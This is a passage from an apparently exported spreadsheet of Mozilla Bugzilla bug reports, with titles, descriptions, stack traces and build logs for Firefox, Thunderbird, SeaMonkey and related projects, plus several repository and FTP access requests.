  </si>
  <si>
    <t>CORE-424814</t>
  </si>
  <si>
    <t>Update Mochitest Prototype Test Suite to 1.6.0.2</t>
  </si>
  <si>
    <t>The test suite that we have for Prototype is out of date at this point it should be upgraded to the latest version: 1.6.0.2.</t>
  </si>
  <si>
    <t>jeresig</t>
  </si>
  <si>
    <t>MOZILLA.ORG-415108</t>
  </si>
  <si>
    <t>Update sgarrity's SVN rw access</t>
  </si>
  <si>
    <t>Please ensure steven@silverorange.com can write to:
svn.mozilla.org/projects/mozilla.com/branches/firefox3
Thanks.</t>
  </si>
  <si>
    <t>THUNDERBIRD-457757</t>
  </si>
  <si>
    <t>assertion when trying to restore selection to missing message</t>
  </si>
  <si>
    <t>I believe in this case the thread is empty.
 	mork.dll!morkEnv::NewError(const char * inString=0x02b4eab8)  Line 404 + 0x13 bytes	C++
 	mork.dll!morkArray::IndexBeyondEndError(morkEnv * ev=0x06799858)  Line 157	C++
 	mork.dll!morkArray::SafeAt(morkEnv * ev=0x06799858 int inPos=0x00000000)  Line 222 + 0x9 bytes	C++
 	mork.dll!morkTable::SafeRowAt(morkEnv * ev=0x06799858 int inPos=0x00000000)  Line 563 + 0x1a bytes	C++
 	mork.dll!morkTable::PosToOid(nsIMdbEnv * mev=0x06799884 int inRowPos=0x00000000 mdbOid * outOid=0x0012dc04)  Line 492 + 0x13 bytes	C++
 	msgdb.dll!nsMsgThread::GetChildKeyAt(int aIndex=0x00000000 unsigned int * result=0x0012dc50)  Line 453 + 0x28 bytes	C++
 	msgbase.dll!nsMsgDBView::GetKeyOfFirstMsgInThread(unsigned int key=0x00000a22)  Line 4142	C++
 	msgbase.dll!nsMsgDBView::FindKey(unsigned int key=0x00000a22 int expand=0x00000001)  Line 4170 + 0xc bytes	C++
 	msgbase.dll!nsMsgDBView::RestoreSelection(unsigned int aCurrentMsgKey=0x00000a22 nsTArray &amp; aMsgKeyArray={...})  Line 824 + 0x16 bytes	C++
 	msgbase.dll!nsMsgDBView::SelectMsgByKey(unsigned int aKey=0x00000a22)  Line 6484 + 0x10 bytes	C++</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-394982</t>
  </si>
  <si>
    <t>talos qm-pxp013 either not working or not reporting</t>
  </si>
  <si>
    <t>Dunno which it is but it last reported to the tinderbox with a build that finished at 16:45 on 2007-09-04 in the midst of the Grand Renaming.</t>
  </si>
  <si>
    <t>CORE-307601</t>
  </si>
  <si>
    <t>Comparing atoms to nsAString is slow</t>
  </si>
  <si>
    <t>nsIAtom.Equals(AString) involves a string copy plus conversion to do the comparison.
I think it would be better to have a comparator that goes along and does
on-the-fly comparison...  This would probably mean factoring the conversion code
out of ConvertUTF8toUTF16 which already lives in XPCOM.
I know jst has mentioned this idea on and off and I could really use it about
now what with bug 307600 (where we're possibly doing a bunch of direct
string-to-atom compares).</t>
  </si>
  <si>
    <t>SEAMONKEY-356746</t>
  </si>
  <si>
    <t>Save As Page... menu item disappears if no window open</t>
  </si>
  <si>
    <t>SeaMonkey recent trunk mac os x.
If you close all windows  the Save Page As... menuitem label disappears from the file menu.
Steps to repro:
1) Launch SeaMonkey
2) Close SeaMonkey window
3) Open the File menu
4) Note that the Save Page As... menuitem label is gone
I see the following js error in the console when I'm opening the File menu:
Error: browser has no properties
Source File: chrome://navigator/content/navigator.js
Line: 1392
Works fine in 2006100106
Does not work in 2006100306</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-221541</t>
  </si>
  <si>
    <t>ocps.net - Menu Line Missing on Webpage Javascript I think.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031007
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031007
When I view this webpage with MSIE there is a menu line across the top of the
Web Page.  This does not display with the current version of Mozilla or Firebird.
Reproducible: Always
Steps to Reproduce:
1. just bring up the web page and compare it to MSIE.
Actual Results:  
The Web Page came up w/o the menu.  Everytime.  
Expected Results:  
It should have displayed a menu with Home Faculty Academics About WPHS
Resources Sports Results Student Life Alumni.
I found the problem with Firebird I installed Mozilla and the problem
persisted.  I didn't see the problem in the list of current bugs but it might
be there.  I really can't use my daughters High School Web page in Mozilla or
Firebird whiles it's acting this way.  Have to switch back over to MSIE.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-479261</t>
  </si>
  <si>
    <t>try server lies about what it's building</t>
  </si>
  <si>
    <t>Created attachment 363139
my notes about what I did and what happened
So I pushed a bunch of changesets to the try server (push-to-try) to figure out which of the 10 changesets that I landed caused the startup test to fail on Mac.  I got 11 builds as described in bug 479260 and 8 talos runs happened that were labeled with the changesets that supposedly generated the builds they were testing.
However the results don't actually make sense so I think it's pretty clear that the label that shows up in the tinderbox waterfall showing which try server build was tested isn't actually the build that was tested.
Attached is the text file describing what I did.  I pushed 10 changesets one-at-a-time and then later pushed 3 changesets (all at once) that were equivalent (but with different dates) to the first three of the 10.  The pattern of orange and green didn't make sense although it could have indicated that the problem causing the startup failure was random but happened most of the time.  (However I have at least 9 runs on the mozilla-central tinderbox saying it happens every time or pretty close to that.)
So on the assumption that it was random but happened most of the time I relanded the changes that were on later than the first orange plus two uninitialized variable fixes that wouldn't cause orange and the mozilla-central tinderbox turned orange again.
(Sorry if that's not clear I can explain in more detail if you really need it.)
So I conclude that the try server was lying to me about which builds it was testing.</t>
  </si>
  <si>
    <t>SEAMONKEY-194692</t>
  </si>
  <si>
    <t>Preview pane uses incorrect characters...</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
When receiving mail in Latin1 portuguese the preview pane will have some
gibberish in some characters like:
Â«Resposta Ã  sugestÃ£o nÃ‚Âº939 Data - 22/02/2003
SugestÃ£o:
Gostaria que fosse tema de anÃƒÂ¡lise a questÃƒÂ£o dos preÃƒÂ§os reais de bilhetes de
aviÃƒÂ£o e os preÃƒÂ§os publicitados dos mesmos especialmente agora que a TAP vai
alterar o sistema de comissÃƒÂµes aos operadores turisticos para aumentar as
famosas e indefinidas Taxas! JÃƒÂ¡ ÃƒÂ© tempo da pouca vergonha das Taxas Â»
When it should show:
Â«Resposta Ã  sugestÃ£o nÂº939 Data - 22/02/2003
SugestÃ£o:
Gostaria que fosse tema de anÃ¡lise a questÃ£o dos preÃ§os reais de bilhetes de
aviÃ£o e os preÃ§os publicitados dos mesmos especialmente agora que a TAP vai
alterar o sistema de comissÃµes aos operadores turisticos para aumentar as
famosas e indefinidas Taxas! JÃ¡ Ã© tempo da pouca vergonha das TaxasÂ»
Cheers...
Luis Ferro
Portugal
Reproducible: Always
Steps to Reproduce:
Not reproduceable because it depends on the sender... thru i would try to send
a Â«ÂºÂ» (raised O) and see if they are received correctly...
Actual Results:  
Ã‚Âº
Expected Results:  
Âº
looks like a problem in the interpretation of the character lenghts... in the
preview pane it shows 2 characters (one gibberish and another the correct one)
when in the open window it shows only the correct one.</t>
  </si>
  <si>
    <t>lferro</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-255753</t>
  </si>
  <si>
    <t>Update for biobar not showing up</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040705 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7) Gecko/20040705 Firefox/0.9.1
Hi
biobar 1.1 has been updated and is available on the update.mozilla.org page.
However the version shown on the main page is still biobar 1.0. The extension
update from firefox for biobar does not pick up the new version either. On
trying to update from firefox the error always is 'Firefox was not able to find
any available updates'. 
I have version 1.2 ready to roll out but am not doing so because this mechanism
is not working.
This is related to Bug 248919 but although that bug has the status Resolved I
do not see any change.
jawahar
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
Presented version 1.1 as the new version update of biobar 1.0</t>
  </si>
  <si>
    <t>jawahar</t>
  </si>
  <si>
    <t>CORE-519371</t>
  </si>
  <si>
    <t>NJ merge: add missing PEDANTIC occurrences</t>
  </si>
  <si>
    <t>Created attachment 403395
patch
TM has most of the PEDANTIC occurrences but is missing a few.  Shouldn't affect TM at all as PEDANTIC is never true for us.</t>
  </si>
  <si>
    <t>CORE-387888</t>
  </si>
  <si>
    <t>Handle variant selectors properly</t>
  </si>
  <si>
    <t>Unicode variant are suported in a very random manner with the new cairo based text rendering.
Steps to reproduce :
- download and install a recent version of code2000 : http://www.code2000.net/code2000_page.htm
- display the page : http://jmdesp.free.fr/i18n/varsel/math-variation-selectors-axx.html
- the variation selector character is displayed as a [VS1] glyph
- the characters displayed in the columns with or without the variation selector are the same
- Go in options. Select the Content tab. Click on the advance button in the font&amp;colors box. Disable the Allow pages to choose their own font instead of my selection above. Selection above should be Times Arial Courrier New. 
Click OK to close the option boxes.
- The display of the page is updated.
- The [VS1] glyph is not more displayed. The characters in the second colums now are the VS1-variant instead of being the same as the first column.
It seems that when code2000 is directly selected for the display the variant selector doesn't work but that when code2000 is used trought some mechanism of font backfall.</t>
  </si>
  <si>
    <t>jmdesp</t>
  </si>
  <si>
    <t>MOZILLA.ORG-294838</t>
  </si>
  <si>
    <t>FTP: Staging</t>
  </si>
  <si>
    <t>Write access to /data/ftp/pub/nspr/releases to stage the NSPR bits</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20041231
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20041231
The NSPR 4.5.1 bits are contributed by Sun Microsystems Inc. I am the RE in
charge of doing this and need write access to /data/ftp/pub/nspr/releases.
Note: I already have an account to access stage.mozilla.org and I already have
write access to /data/ftp/pub/security.
Reproducible: Always
Steps to Reproduce:
-bash-2.05b$ pwd
/data/ftp/pub/nspr/releases
-bash-2.05b$ mkdir v4.5.1
mkdir: cannot create directory `v4.5.1': Permission denied
-bash-2.05b$ uname -a
Linux manna 2.4.21-27.0.2.ELsmp #1 SMP Wed Jan 12 23:35:44 EST 2005 i686
i686 i386 GNU/Linux
Wan-Teh Chang is already aware of this request and gave me his blessing.</t>
  </si>
  <si>
    <t>christophe.ravel.bugs</t>
  </si>
  <si>
    <t>SEAMONKEY-488499</t>
  </si>
  <si>
    <t>Registry key SeaMonkeyHTML created under HKCU rather than HKCR</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090414 SeaMonkey/2.0b1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090414 SeaMonkey/2.0b1pre
When HKEY_CLASSES_ROOT\SeaMonkeyHTML exists installer creates HKEY_CURRENT_USER\SeaMonkeyHTML.
Reproducible: Always
Steps to Reproduce:
1.Run REGEDIT.EXE delete HKEY_CURRENT_USER\SeaMonkeyHTML if it exists.
2.Install SeaMonkey twice.
3.Refresh and check if there is a key named SeaMonkeyHTML under HKEY_CURRENT_USER.
Actual Results:  
HKEY_CURRENT_USER\SeaMonkeyHTML has been created.
Expected Results:  
The old HKEY_CLASSES_ROOT\SeaMonkeyHTML should be overwritten.</t>
  </si>
  <si>
    <t>ZaneUJi</t>
  </si>
  <si>
    <t>CORE-342035</t>
  </si>
  <si>
    <t>Expose all display:block elements via nsIAccessibleText</t>
  </si>
  <si>
    <t>In bug 340829 we are implementing nsIAccessibleText across all platforms. All elements that are styled with display:block should implement this interfaces and expose roles such as ROLE_PARAGRAPH ROLE_HEADING etc.</t>
  </si>
  <si>
    <t>DIRECTORY-106627</t>
  </si>
  <si>
    <t>[mach] Add Darwin support</t>
  </si>
  <si>
    <t>CORE-335449</t>
  </si>
  <si>
    <t>gmail - collapsed mail won't expand</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20060425 Minefield/3.0a1 ID:2006042512 [cairo]
repro:
1.Open a mail with multiple messages that have been read before
the mailtabs look like
 -------------------------------
|* message                      |
 -------------------------------
|                               | &lt;-
 -------------------------------
|                               | &lt;-
 -------------------------------
|                               | &lt;-
 -------------------------------
|* another message              |
 -------------------------------
|* another message              |
 -------------------------------
2.click on a field that appears empty (indicated with &lt;-)
result: 
nothing happens
expected:
the messages to expand
I'll try to figure out when this regressed (tomorrow)</t>
  </si>
  <si>
    <t>FIREFOX-383339</t>
  </si>
  <si>
    <t>dragging favicon from address bar into Dock does not produce a link</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Links in web pages can be dragged and dropped into the right (or bottom) half of the Dock to create links.  However dragging the favicon from the address bar to the dock does not create such a link.  (Dragging it to e.g. the desktop creates the expected .webloc file.)
Reproducible: Always</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-262018</t>
  </si>
  <si>
    <t>RSS feed does not show article body if feed title contains certain characters</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Thunderbird version 0.8 (20040913)
If title contains semi-colon Thunderbird does not show article bodies whether
attempting to use article summaries or the link.
Reproducible: Always
Steps to Reproduce:
1.Add an RSS feed with a title ending in a semi-colon
2.Attempt to view message bodies.
Actual Results:  
Blank article body
Expected Results:  
Shown either the article summary or the webpage in the link.
Since it is my RSS feed I added a switch to change the title of the feed.
1. http://www.eng.uwaterloo.ca/~jyeh/rssupdates.php
2. http://www.eng.uwaterloo.ca/~jyeh/rssupdates.php?compatibility=1
Both feed URLs return the same content with the exception of the title - URL 1
contains a trailing semi-colon and URL 2 does not. Thunderbird displays the
article summaries for Feed URL 2 but not for Feed URL 1.</t>
  </si>
  <si>
    <t>jasper.yeh</t>
  </si>
  <si>
    <t>THUNDERBIRD-503794</t>
  </si>
  <si>
    <t>Unable to remove an attachment</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_5_7 de-de) AppleWebKit/530.19.2 (KHTML like Gecko) Version/4.0.2 Safari/530.19
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a1pre) Gecko/20090711 Shredder/3.1a1pre
If you attach in TB 3.1a1pre a file in the compose window you are unable to remove it because Delete is greyed out.
Reproducible: Always
Steps to Reproduce:
1. In TB 3.1a1pre open the compose window and with Attach attach a file
2. Right click the file and try to remove it
Actual Results:  
Its not possible to remove it because Delete is greyed out
Expected Results:  
Delete should not be greyed out
The screenshots in the attachment are from
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.1pre) Gecko/20090711 Shredder/3.0b3pre
and
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a1pre) Gecko/20090711 Shredder/3.1a1pre</t>
  </si>
  <si>
    <t>CORE-488901</t>
  </si>
  <si>
    <t>Typing in twitter status field can be painfully slow</t>
  </si>
  <si>
    <t>Created attachment 373370
Testcase
The profiles show a great deal of time being spent rescaling the image.</t>
  </si>
  <si>
    <t>CALENDAR-309527</t>
  </si>
  <si>
    <t>Date is changed to the previous day when updating all day events</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050912 Firefox/1.0.6 (Ubuntu package 1.0.6)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050912 Firefox/1.0.6 (Ubuntu package 1.0.6)
Whenever I open up an all-day event to update it the date is changed to the
previous day.  For instance if I open an event that takes all day on 9/28/2005
as soon as the dialog box opens up the From and To dates are both set to
9/27/2005.
Reproducible: Always
Steps to Reproduce:
1. Create an all-day event by checking the All day checkbox. Save the event.
2. Double click on the event you just created to open it up for editing.
3. From and to dates are now set to the previous day.
Actual Results:  
The from and to dates are set to the prior day's date.
Expected Results:  
It should not have changed the from and to dates.
I am using the sunbird-0.2+.en-US.linux-i686.tar.bz2 binary that I downloaded
on September 21 2005.</t>
  </si>
  <si>
    <t>benny_hill3</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-263294</t>
  </si>
  <si>
    <t>Add Rigntone Search extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041004 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.3) Gecko/20041004 Firefox/0.10.1
Ringtone Search !
This extension allows you to use search ringtone for the selection you made
straight from the context menu. You can search by title or artist. Just select
the name of the song or artist.
http://extensions.meatme.net/ringtones.xpi
Author: Kristof Polleunis
Version: 0.1
Size:13 KB
Date: 06/10/04
Compatibility: ( 0.9 - 0.10)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>jedsbugs</t>
  </si>
  <si>
    <t>kpol72</t>
  </si>
  <si>
    <t>CORE-365243</t>
  </si>
  <si>
    <t>use small native scrollbars for HTML form elements</t>
  </si>
  <si>
    <t>We should use small native scrollbars for HTML form elements. That would be more efficient space-wise and it'd look better.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-493007</t>
  </si>
  <si>
    <t>Skin infos warnings and errors appropriately in notification box</t>
  </si>
  <si>
    <t>The new notification element is pretty plain. It should distinguish appropriately between at least these three types of notifications.
We may ask faaborg for suggestions he recently blogged about this: http://blog.mozilla.com/faaborg/2009/05/11/critical-warning/</t>
  </si>
  <si>
    <t>BUGZILLA-388165</t>
  </si>
  <si>
    <t>Remove obsolete $field_descs.groupset</t>
  </si>
  <si>
    <t>Created attachment 272324
patch v1
AFAICS groupset was last used in Bugzilla 2.16 see bug 157756. We no longer need it (and would avoid translators wondering what this field is).</t>
  </si>
  <si>
    <t>SEAMONKEY-201381</t>
  </si>
  <si>
    <t>Auto-importing IE favorites with directory entries may take a very long time CPU usage 100%</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030408 Phoenix/0.5+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030408 Phoenix/0.5+
When starting with a new profile Mozilla imports IE Favorites.  If one of the
entries in Favorites is a directory entry (such as C:\) or a network entry (such
as \\nova\files) it recurses down through these to create bookmarks for
everything below there.  This can take an incredibly long time.
I checked bugs listed under bug 120814 (the Favorites tracking bug) but I
didn't see anything that addressed this specific problem.
Reproducible: Always
Steps to Reproduce:
1. Shut down Mozilla.
2. Remove or rename your profile directory.
3. Open Windows Explorer (not Internet Explorer) and navigate to C:\.
4. Create a favorite for C:\.
5. Start Mozilla.
Actual Results:  
Mozilla appears to hang while it recurses and creates bookmarks for every
directory below the directory favorite.
Expected Results:  
Mozilla should either not recurse when it's a directory entry (local or network)
or it should warn the user that it could take a very long time.
This problem can be seen in both Mozilla and Phoenix.</t>
  </si>
  <si>
    <t>CORE-369850</t>
  </si>
  <si>
    <t>SVG sometimes fails to render when vertically resized</t>
  </si>
  <si>
    <t>Created attachment 254532
testcase
When SVG content is resized it flickers badly and then frequently fails to render. Loading the attached testcase I noticed that there are no flickering or rendering problems when only the width of the browser window is changed. The problem always shows when the bottom edge of the browser window is dragged to resize the height of the window.
Looking back through the archives I found the build directly before the landing of the reflow branch works fine but the build directly after it has this regression.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-471926</t>
  </si>
  <si>
    <t xml:space="preserve">Hg Account Request - alta88 </t>
  </si>
  <si>
    <t>alta88 is a major contributor to the Snowl project who has had longstanding commit access to the Snowl source code repository on Mozdev.  Now that I've moved revision control for the project from the Mozdev repository to the repository at http://hg.mozilla.org/labs/snowl/ I'd like alt88 to have commit access to that repository.
I'll have alta88 attach an SSH version 2 DSA public key and complete and return a committer's agreement.</t>
  </si>
  <si>
    <t>CORE-231157</t>
  </si>
  <si>
    <t>deCOMtaminate nsCSSFrameConstructor</t>
  </si>
  <si>
    <t>nsCSSFrameConstructor doesn't really need to have an XPCOM interface.  There's
exactly 1 place where it's currently used from outside layout and that's easily
solved by making an existing PresShell method public.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-367834</t>
  </si>
  <si>
    <t>Kill http://www.mozilla.org/xpfe/xulref/ (XUL Programmer's reference)</t>
  </si>
  <si>
    <t>XUL Programmer's reference should be removed from mozilla.org as it's outdated and we have much more up-to-date and correct reference on MDC:
http://developer.mozilla.org/en/docs/XUL_Reference
I started a thread about this on dev-mdc and sheppy shaver and enn agreed that this is a good idea:
http://groups-beta.google.com/group/mozilla.dev.mdc/browse_thread/thread/3f4bafbecc948443/351691938127962e#351691938127962e
So we need http://www.mozilla.org/xpfe/xulref/ CVS removed and redirects set up to MDC's reference.
I don't think we want to waste time trying to redirect to element-specific pages so everything should just redirect to http://developer.mozilla.org/en/docs/XUL_Reference
Note that there also is http://www.mozilla.org/xpfe/xulref-french/ and we don't yet have fr translation of the up-to-date reference on MDC so I think we shouldn't remove that one yet.</t>
  </si>
  <si>
    <t>CORE-211181</t>
  </si>
  <si>
    <t>[FIXr]URI fixup should work with UTF8 strings</t>
  </si>
  <si>
    <t>Patch coming up.  This makes the code a little saner in a few places...</t>
  </si>
  <si>
    <t>DEVTOOLS-734439</t>
  </si>
  <si>
    <t>Source Editor</t>
  </si>
  <si>
    <t>Add code folding support to the source editor</t>
  </si>
  <si>
    <t>Orion upstream has some support for code folding. We should look into that and see if it's ready to be enabled in the source editor.
We should start with JavaScript support but if it's easy to do then CSS as well.</t>
  </si>
  <si>
    <t>mihai.sucan</t>
  </si>
  <si>
    <t>SOCORRO-524851</t>
  </si>
  <si>
    <t>Page for a signature should suggest more refined searches based on correlations</t>
  </si>
  <si>
    <t>When I click a signature from the topcrash list I'd like to be presented with a list of correlations.  Currently that information is available (thanks to bug 521917) but scattered I have to look in a different place for each possible type of correlation which doesn't match my workflow.
Clicking on a correlation should search for matching crash reports.  Ideally it would also show correlations within the restricted search (e.g. is it still correlated with the presence of an extension even just on single-core machines?).
This requires Socorro to be able to support more types of searches (e.g. bug 524847) and remember or compute correlations.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-345737</t>
  </si>
  <si>
    <t>Add VPAT for Firefox 2 including appropriate information updates</t>
  </si>
  <si>
    <t>Currently we have a VPAT for Firefox 1.5.x for Windows. We need a VPAT for Firefox 2.x on Windows. The VPAT lives at http://www.mozilla.com/firefox/vpat.html
Necessary changes that I know about:
1) Access to live feeds has been fixed (see key nav section)
2) Any important high contrast issues should be mentioned in the section on compatibility with operating system a11y features.
3) We have a help section now that addresses a11y
Move older Firefox 1.5 VPAT to a new location such as vpat15.html and point to it from the new VPAT.
Mark Pilgrim can provide additional information.</t>
  </si>
  <si>
    <t>CORE-393801</t>
  </si>
  <si>
    <t xml:space="preserve">[FIX]ASSERTION: Already have an undisplayed context entry for aContent with multiple  elements and position:absolute in </t>
  </si>
  <si>
    <t>Created attachment 278342
iframe content (needed by testcase)
###!!! ASSERTION: Already have an undisplayed context entry for aContent: '!GetUndisplayedContent(aContent)' file /Users/jruderman/trunk/mozilla/layout/base/nsFrameManager.cpp line 571
###!!! ASSERTION: Gap or overlap in textframes mapping content?!: 'endOfLastContent == contentStart' file /Users/jruderman/trunk/mozilla/layout/generic/nsTextFrameThebes.cpp line 1587
I originally saw this on http://coolcatteacher.blogspot.com/2005/12/wiki-wiki-teaching-art-of-using-wiki.html. I'm attaching a two-file reduced testcase based on that page.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-433652</t>
  </si>
  <si>
    <t>Urchin tags need to be added to the redesign of Mozilla.com for Firefox 3</t>
  </si>
  <si>
    <t>In order to ensure continuity in tracking we need to make sure Urchin tags are added to all new mozilla.com site pages for the site redesign.  Without these tags we will be unable to determine year-year performance of Mozilla.com or make any data comparisons going forward.
Urchin tags and Omniture tags can co-exist (as they currently do on mozilla.com).</t>
  </si>
  <si>
    <t>TOOLKIT-294208</t>
  </si>
  <si>
    <t>FAYT shoudn't be blocked when a form button checkbox or a radio element is focused</t>
  </si>
  <si>
    <t>The findbar implementaion blocks fayt whenever an  element is focused
this (also) includes buttons radios and checkboxes which are a no-real-blocker
to fayt.
(FYI it's a ff-only bug the xpfe version seems to work fine ) )</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-382925</t>
  </si>
  <si>
    <t>add a new tree to tinderbox.mozilla.org for Joey</t>
  </si>
  <si>
    <t>Please add a new tree for Joey to tinderbox.mozilla.org
Name can be Project Joey.
Thanks</t>
  </si>
  <si>
    <t>CORE-517083</t>
  </si>
  <si>
    <t>TM: introduce a temp allocator for allocations during recording and compilation</t>
  </si>
  <si>
    <t>This will reduce memory pressure on the long-lived code and data allocator.</t>
  </si>
  <si>
    <t>SEAMONKEY-408844</t>
  </si>
  <si>
    <t>Installer repackaging and installation of ChatZilla language packs</t>
  </si>
  <si>
    <t>Bug 397246 gives us ChatZilla language packs and packages them into tarballs and zips in the locale repackaging step but we also want to pack them into installer and install them together with ChatZilla.</t>
  </si>
  <si>
    <t>CORE-391447</t>
  </si>
  <si>
    <t>Mingw build error - error: no matching function for call to `nsDerivedSafe::ToUpper</t>
  </si>
  <si>
    <t>After I updated my tree I get this build error:
-Wsynth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -pedantic -m
ms-bitfields -pipe  -DDEBUG -D_DEBUG -DDEBUG_mw -DTRACING -g   -DMOZILLA_CLIENT
-include ../../../../mozilla-config.h /cygdrive/c/mozilla/mozilla/extensions/spe
llcheck/hunspell/src/suggestmgr.cpp
In file included from c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/sugg
estmgr.hxx:74
                 from c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/sugg
estmgr.cpp:69:
c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/atypes.hxx:65:30: warning:
 anonymous variadic macros were introduced in C99
csutil.cpp
/cygdrive/c/mozilla/mozilla/build/cygwin-wrapper g++ -mno-cygwin -o csutil.o -c
 -DMOZILLA_INTERNAL_API -DOSTYPE=\WINNT5.1\ -DOSARCH=WINNT  -I../../../../dist
/include/xpcom -I../../../../dist/include/string -I../../../../dist/include/ucon
v -I../../../../dist/include/unicharutil -I../../../../dist/include/spellchecker
 -I../../../../dist/include/xulapp -I../../../../dist/include   -I../../../../di
st/include/hunspell -I../../../../dist/include/nspr  -DMOZ_PNG_READ -DPNG_NO_MMX
_CODE -DMOZ_PNG_WRITE   -I../../../../dist/sdk/include       -fno-rtti -fno-exce
ptions -Wall -Wconversion -Wpointer-arith -Wcast-align -Woverloaded-virtual -Wsy
nth -Wno-ctor-dtor-privacy -Wno-non-virtual-dtor -Wno-long-long -pedantic -mms-b
itfields -pipe  -DDEBUG -D_DEBUG -DDEBUG_mw -DTRACING -g   -DMOZILLA_CLIENT -inc
lude ../../../../mozilla-config.h /cygdrive/c/mozilla/mozilla/extensions/spellch
eck/hunspell/src/csutil.cpp
In file included from c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/csut
il.cpp:68:
c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/atypes.hxx:65:30: warning:
 anonymous variadic macros were introduced in C99
c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/csutil.cpp: In function `s
hort unsigned int unicodetoupper(short unsigned int int)':
c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/csutil.cpp:5221: error: no
 matching function for call to `nsDerivedSafe::ToUpper(short
unsigned int&amp; short unsigned int*)'
../../../../dist/include/unicharutil/nsICaseConversion.h:56: note: candidates ar
e: virtual nsresult nsICaseConversion::ToUpper(PRUnichar PRUnichar*) &lt;near matc
h&gt;
../../../../dist/include/unicharutil/nsICaseConversion.h:65: note:
   virtual nsresult nsICaseConversion::ToUpper(const PRUnichar* PRUnichar* PRU
int32)
c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/csutil.cpp: In function `s
hort unsigned int unicodetolower(short unsigned int int)':
c:/mozilla/mozilla/extensions/spellcheck/hunspell/src/csutil.cpp:5241: error: no
 matching function for call to `nsDerivedSafe::ToLower(short
unsigned int&amp; short unsigned int*)'
../../../../dist/include/unicharutil/nsICaseConversion.h:59: note: candidates ar
e: virtual nsresult nsICaseConversion::ToLower(PRUnichar PRUnichar*) &lt;near matc
h&gt;
../../../../dist/include/unicharutil/nsICaseConversion.h:68: note:
   virtual nsresult nsICaseConversion::ToLower(const PRUnichar* PRUnichar* PRU
int32)
make[6]: *** [csutil.o] Error 1
make[6]: Leaving directory `/cygdrive/c/mozilla/mozilla/extensions/spellcheck/hu
nspell/src'
make[5]: *** [libs] Error 2
make[5]: Leaving directory `/cygdrive/c/mozilla/mozilla/extensions/spellcheck/hu
nspell'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/c/mozilla/mozilla/extensions/spellcheck'
make[3]: *** [libs_tier_toolkit] Error 2
make[3]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make[2]: *** [tier_toolkit] Error 2
make[2]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make: *** [alldep] Error 2
I guess this happens because bug 319778 is fixed now.</t>
  </si>
  <si>
